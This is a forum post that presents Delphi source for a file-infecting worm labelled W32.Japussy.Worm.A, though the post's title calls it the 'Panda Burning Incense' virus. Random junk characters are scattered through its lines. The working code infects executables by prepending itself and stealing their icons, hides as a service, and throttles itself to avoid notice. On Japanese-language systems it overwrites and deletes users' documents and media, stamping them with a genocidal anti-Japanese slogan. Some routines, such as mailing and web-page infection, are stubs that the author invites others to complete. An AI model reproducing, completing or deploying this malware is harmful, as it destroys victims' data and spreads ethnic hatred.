熊猫烧香源代码

源代码, 熊猫烧香, Upx, 图标, HeaderSize

熊猫烧香源代码
1 X& E" R  A1 P+ j8 B% W* y9 D
$ p' s/ C! v2 |  s; L! B( T3 G+ g( o
program Japussy; ! S$ f4 d) ]' ~! }' `' g
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; ! F: F8 v6 I! S( z3 a& c, C
const ! s% u& [. L& @2 T- _+ v: T7 |
HeaderSize = 82432; //病毒体的大小 ! E! o4 V6 m. }+ k3 a
IconOffset = $12EB8; //PE文件主图标的偏移量 ! B) O  Q6 P% [8 R/ }

//在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量

{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量
! n7 R5 d" D  e4 b) b1 H! u) Q
% A) m# p' `  z# g3 U5 W
1 b4 }+ [1 Q0 E# h" L3 X
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe 1 a6 _! C3 R6 r4 X6 G
}
IconSize = $2E8; //PE文件主图标的大小--744字节 . X5 Y+ h1 R, L: c
IconTail = IconOffset + IconSize; //PE文件主图标的尾部 6 j; N0 ^, ]1 W! H. w- T; S5 C
ID = $44444444; //感染标记
/ S  `5 i+ d/ ]* Q) d* Z1 J
//垃圾码，以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' + . C0 f9 O* a  L' Y! ~; m
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函数声明
var 2 |4 I$ |6 M" W$ G4 j! T
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean; " D9 ~2 m" R7 H
var 4 b9 `) q  A. @' s- U
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit; ) `( [/ q" Y- X0 `
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x 6 R- n; @5 f# u+ K7 ?7 _* r5 N
Result := True;   a! |+ H3 _5 i+ U3 k7 d8 {$ `
end; 0 a7 H3 b, G  H6 c4 }6 D; a1 [( i
{ 在流之间复制 } / X: q, ^# H7 F! B$ @
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var " p9 w$ s# b3 L% C7 Z
sCurPos, dCurPos: Integer;
begin $ J( f. a- a2 k7 q$ g
sCurPos := Src.Position;
dCurPos := Dst.Position; 9 O6 L5 a" s; q& F
Src.Seek(sStartPos, 0); 7 ]8 l0 L  ~. x; o  ]0 K. X' ?
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count); / A0 d! b6 `' G) f0 a
Src.Seek(sCurPos, 0); % \0 h6 R3 B6 J8 ]0 j, [
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来，以备使用 } . L' l. y9 t$ g/ c
procedure ExtractFile(FileName: string); * @2 B0 y7 E, |$ A1 s# l6 c8 ], P
var
sStream, dStream: TFileStream; * y2 j! P0 `0 y- o
begin / m" V# y% S" \6 X5 k
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); 6 h" `( ~4 R/ S* J! \: J
try   A* T" j( H) s/ s$ w& [: v! s9 A
dStream := TFileStream.Create(FileName, fmCreate); 1 o/ i8 a' o1 b4 r' f5 s
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free; - Y* |0 K: Q+ D, y  _. q3 z
end; 6 ]% H  n) q2 M/ c4 a2 v
finally * V- a" Z% r1 N2 `
sStream.Free; 1 @7 @$ X4 f0 ]/ P; b2 S& Y
end; ) G: j6 Y7 O" w
except
end; 4 n1 w7 C1 R. v9 m* X& K
end; * \3 l. |$ H8 `- i
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;   U2 @% R' J2 P9 ]0 O# B- \
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil; 8 f0 t* J( a; A! {0 K& D
end; . P# L$ x; V5 _8 ^0 i$ ?+ x1 f* `
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之？汤姆感激不尽！ % {) y) ~: F4 V
end;
{ 感染PE文件 } . V6 N4 i( Y, }0 Y( @
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream; & t- c% Y5 g' ]/ V- f7 H
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean; ( k: Q( f6 a# N8 o. A
i: Integer;   q$ `3 K+ ^+ |8 |! E
Buf: array[0..1] of Char; + Z! T% ~4 w9 y
begin
try //出错则文件正在被使用，退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染 . e" ^. Y2 S3 g7 F+ k* y
Exit;
Infected := False;
IsPE := False; 4 Y9 `8 i# ~: O, x
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //检查PE文件头
begin * D: b2 i% z' v! o; z' v' n" }; O
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
begin
IsPE := True; //是PE文件 3 s' S$ _1 H- t0 b* E
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //检查感染标记
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染 , z8 C6 ~2 v: g
Infected := True;
finally
SrcStream.Free;
end; 5 R* r+ h: ?0 r+ ?+ ~9 I0 q4 F0 \
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出 $ f/ w" |( t) D( U
Exit;
IcoStream := TMemoryStream.Create; - b  A3 y4 j, M
DstStream := TMemoryStream.Create; 7 m, J' g( I* G6 N' ]1 c( [: J2 h
try
aIcon := TIcon.Create; - ?9 N# ]; Q4 E- X4 a0 t! U+ N2 z% W: ~
try % H4 J' W5 }, l7 M
//得到被感染文件的主图标(744字节)，存入流 ; `; c! ?  {2 N# C' T
aIcon.ReleaseHandle; , r$ k3 _* S$ P5 {& l: e" ]" d
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0); ) C) H" }1 v5 b* k
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free; 1 s; o9 u* I! m
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead); 0 ?0 l* v( A8 T
//头文件 0 b7 V  g! e0 U
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); . x3 I0 u' S' o1 D+ q3 _
try
//写入病毒体主图标之前的数据 * I8 Z0 u( h9 z4 X
CopyStream(HdrStream, 0, DstStream, 0, IconOffset); ; N6 v4 E5 M( E3 _
//写入目前程序的主图标
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize); : {& C, ]5 {5 @: r$ f, f; v
//写入病毒体主图标到病毒体尾部之间的数据 , p5 f& ^7 `" p2 o3 O( {  `
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail); 9 Y: R( B$ P4 z: [* v- S" `, I: I
//写入宿主程序 2 K, Z& l# B* R8 w
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//写入已感染的标记 0 j, d: c; N8 i' g, U) ?' @
DstStream.Seek(0, 2);   q0 Y, U6 \9 T! X) `
iID := $44444444; % e7 ]) H0 D- m! Z+ x- F
DstStream.Write(iID, 4); ; N1 ?+ C2 ?. `
finally
HdrStream.Free;
end;   T7 u6 w+ q$ D' z. `
finally 1 s& M; g# v# c0 f% Q
SrcStream.Free; ! i: D7 a! ~! N0 `" Z7 P- ~
IcoStream.Free;
DstStream.SaveToFile(FileName); //替换宿主文件
DstStream.Free;
end;
except;
end; " l2 p0 Q: y" S& M' D
end;
{ 将目标文件写入垃圾码后删除 } 6 |- u* w* w& @5 t
procedure SmashFile(FileName: string); - u: J& W6 q! k5 Q5 U3 N
var 6 t- f- b1 a7 X7 C; c
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin 0 o9 x4 d  a$ ~! I% d$ X
try
SetFileAttributes(PChar(FileName), 0); //去掉只读属性 # q) R+ H2 d  v. I2 N
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
try
Size := GetFileSize(FileHandle, nil); //文件大小 ( Z* E/ q7 P" U: b/ a
i := 0;
Randomize; ! j# w' t& G. x* _
Max := Random(15); //写入垃圾码的随机次数 & v/ ^# L3 i) `1 E
if Max < 5 then ; j. K( f$ \! C5 s! k. ~# b  w
Max := 5; % @+ Y9 Z0 R  _% E
Mass := Size div Max; //每个间隔块的大小 / g  A4 P2 M6 R$ g
Len := Length(Catchword);
while i < Max do
begin # d/ c- `4 t, E. e+ T: R$ e
FileSeek(FileHandle, i * Mass, 0); //定位 4 R/ C* p8 Q2 c
//写入垃圾码，将文件彻底破坏掉
FileWrite(FileHandle, Catchword, Len); ) x, E( {1 u/ ?/ G2 i
Inc(i);
end;
finally
FileClose(FileHandle); //关闭文件 ) B# h5 J9 L* ~/ l5 G
end; : F3 @/ ~- _" ?; V5 |
DeleteFile(PChar(FileName)); //删除之
except ; b0 K+ J, T2 G7 U! O8 A. a
end; $ p5 ~; p; \/ Z: r+ h$ S* h
end;
{ 获得可写的驱动器列表 }
function GetDrives: string;
var ! b$ ?1 [: s9 j+ t, L
DiskType: Word; 7 n6 j$ H6 j) p# G" U7 E
D: Char; 7 t% C/ ^# G6 z3 |" m
Str: string; / \/ W% C' a9 h8 S
i: Integer;
begin " F/ g+ Y' W0 R
for i := 0 to 25 do //遍历26个字母 * e# w/ x) x2 N
begin . B# q  X6 v1 y3 t& ~8 g3 B
D := Chr(i + 65); ! K7 }: b4 j: ^7 E! \
Str := D + ':\';
DiskType := GetDriveType(PChar(Str)); + B6 Q4 g; F$ Z  s- L
//得到本地磁盘和网络盘 ( [# v  \! [# a' g, j2 {
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;   q0 a( L7 h( F
end; : @. u( n! f/ j- U* A
end;
{ 遍历目录，感染和摧毁文件 }
procedure LoopFiles(Path, Mask: string);
var # f# p7 P3 L6 H5 ~& t  [6 {
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings; ( k- ?  C3 _' q3 d6 a2 k" r7 S2 r
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer; 8 @& V' r, n' ]( i5 d1 o
begin + v5 u7 \# e7 S  r
if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 0 //不是目录 & e, w% |/ n6 Y. [1 H% ~2 f
else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then # S% l2 {5 ^/ R$ J
Result := 1 //不是根目录 ! X9 O) o& t: u- Q4 M' e4 g4 `
else Result := 2; //是根目录 2 O9 R1 l  S* t
end;
begin " K7 d# T5 w7 M- B5 ?# P6 i" L, }5 o
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin $ k. b! D9 M! Y4 g/ A/ D
repeat ; |& t4 o; l& _# |* C9 {$ Y9 W8 P
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列，避免引起怀疑 ' T. K9 Z$ |& \
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name; ! K/ q/ s$ A/ u4 \; x# b
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then ( ^* D7 X% }  x; q" W
begin
InfectOneFile(Fn); //感染可执行文件
end ) @' L! H! y( j# |, ?9 ^# t. W
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件，将Base64编码后的病毒写入
//感染浏览此网页的所有用户，这个是我最喜欢的！ $ I2 o% F" X, k9 P  K* O
//哪位大兄弟愿意完成之？汤姆感激不尽！
end : u6 d5 [1 Z! G/ L; q& F5 F: ?7 L
else if Ext = '.WAB' then //Outlook地址簿文件
begin 1 u; y( [# o+ j9 f
//获取Outlook邮件地址 , {6 }) s" K/ ]3 f
end ( |0 M* Z0 j& U1 N2 K' m
else if Ext = '.ADC' then //Foxmail地址自动完成文件 3 z# C0 p7 o0 ?; V3 b8 Z$ E
begin 0 v; M! ^, m, d3 l% m& d" _
//获取Foxmail邮件地址 0 R1 m- m. |3 P5 ~$ v
end ; ]. ]& }: I' ~6 A# E: l7 z
else if Ext = 'IND' then //Foxmail地址簿文件 & ?. v. H) n& u7 y3 |0 y% B+ ^4 R$ q
begin + [7 H8 {3 ?5 z
//获取Foxmail邮件地址
end
else
begin
if IsJap then //是倭文操作系统 % i* Z4 G# K8 W
begin 5 Q( \# n+ m. P$ L
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or 3 V4 G; c* v2 f8 V6 ~5 j: s& L( C1 m
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or 3 C% M3 c$ c3 V& W3 o
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or 7 r# E: V8 @4 M  M1 ?
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毁文件 5 x5 j  D) {% p' ^3 y) P
end;
end;
end; ; J# B' k7 r- \6 ^
//感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑
Sleep(200); 7 Q9 u: a+ r5 B$ `0 Q/ G. d/ K
until (FindNext(SearchRec) <> 0); ; B! G/ |+ t& ^: [! F
end; 1 J6 Y  s% h, \  C* N- h
FindClose(SearchRec); 4 y- }0 z% [2 W; w2 _) G# G6 D
SubDir := TStringList.Create; . ?6 O2 y6 Z' t1 v9 n, }+ p' `
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then & Y0 h- \$ ?3 J" m3 e" p
SubDir.Add(SearchRec.Name); ) ]4 t2 Z7 F. `3 A
until (FindNext(SearchRec) <> 0); 8 t; g; ?# h9 x0 G" [! g
end; ( m0 `4 M% B- U/ ~+ O6 ?. x
FindClose(SearchRec); 8 A* n$ J' \* A% o2 s9 U
Count := SubDir.Count - 1; $ U& N  S9 q& O1 ?% m7 e
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + '\', Mask);
FreeAndNil(SubDir); 1 [( Q" Y. N, H7 b8 u+ T. Y% A0 F& R
end;
{ 遍历磁盘上所有的文件 } 7 U, Z* L7 R# G) Z  D9 |, F
procedure InfectFiles;
var 7 I& A" @) u; P+ A  X$ p1 Q, W
DriverList: string; ' J# ?# [/ q$ ~  u
i, Len: Integer; + a) n* F2 T& ]
begin / N( N  G* C% B4 G2 f, r
if GetACP = 932 then //日文操作系统
IsJap := True; //去死吧！
DriverList := GetDrives; //得到可写的磁盘列表 ( z: A; Z, c& P) F8 T' B
Len := Length(DriverList);
while True do //死循环
begin   m8 G) u( o# Q* I: `4 {
for i := Len downto 1 do //遍历每个磁盘驱动器
LoopFiles(DriverList + ':\', '*.*'); //感染之
SendMail; //发带毒邮件 1 g* F2 _9 F/ Y+ x2 V% k' f8 b( ^* S
Sleep(1000 * 60 * 5); //睡眠5分钟
end; ! f8 k3 X+ j7 [% _: N
end; ! m+ s8 T0 I1 X
{ 主程序开始 } 5 l/ [& W$ C$ C% y" z
begin , o' C0 S9 h: }/ }
if IsWin9x then //是Win9x , O* r) X) V0 z) f( T/ h
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
else //WinNT
begin
//远程线程映射到Explorer进程
//哪位兄台愿意完成之？汤姆感激不尽！
end;
//如果是原始病毒体自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then ) _9 R+ N/ y$ @( c5 O. e
InfectFiles //感染和发邮件
else //已寄生于宿主程序上了，开始工作 & ]- h, @7 K1 F; Y3 `/ V3 w
begin
TmpFile := ParamStr(0); //创建临时文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件，多一个空格 / Y) `* \2 `( g! ]- R& G7 v
ExtractFile(TmpFile); //分离之 $ c+ e- K7 I/ K9 I- u5 ?# Y
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //创建新进程运行之
InfectFiles; //感染和发邮件 $ A1 [$ Z6 J# J+ t6 ^
end;
end

收藏分享评分

回复引用

订阅 TOP

nbhhs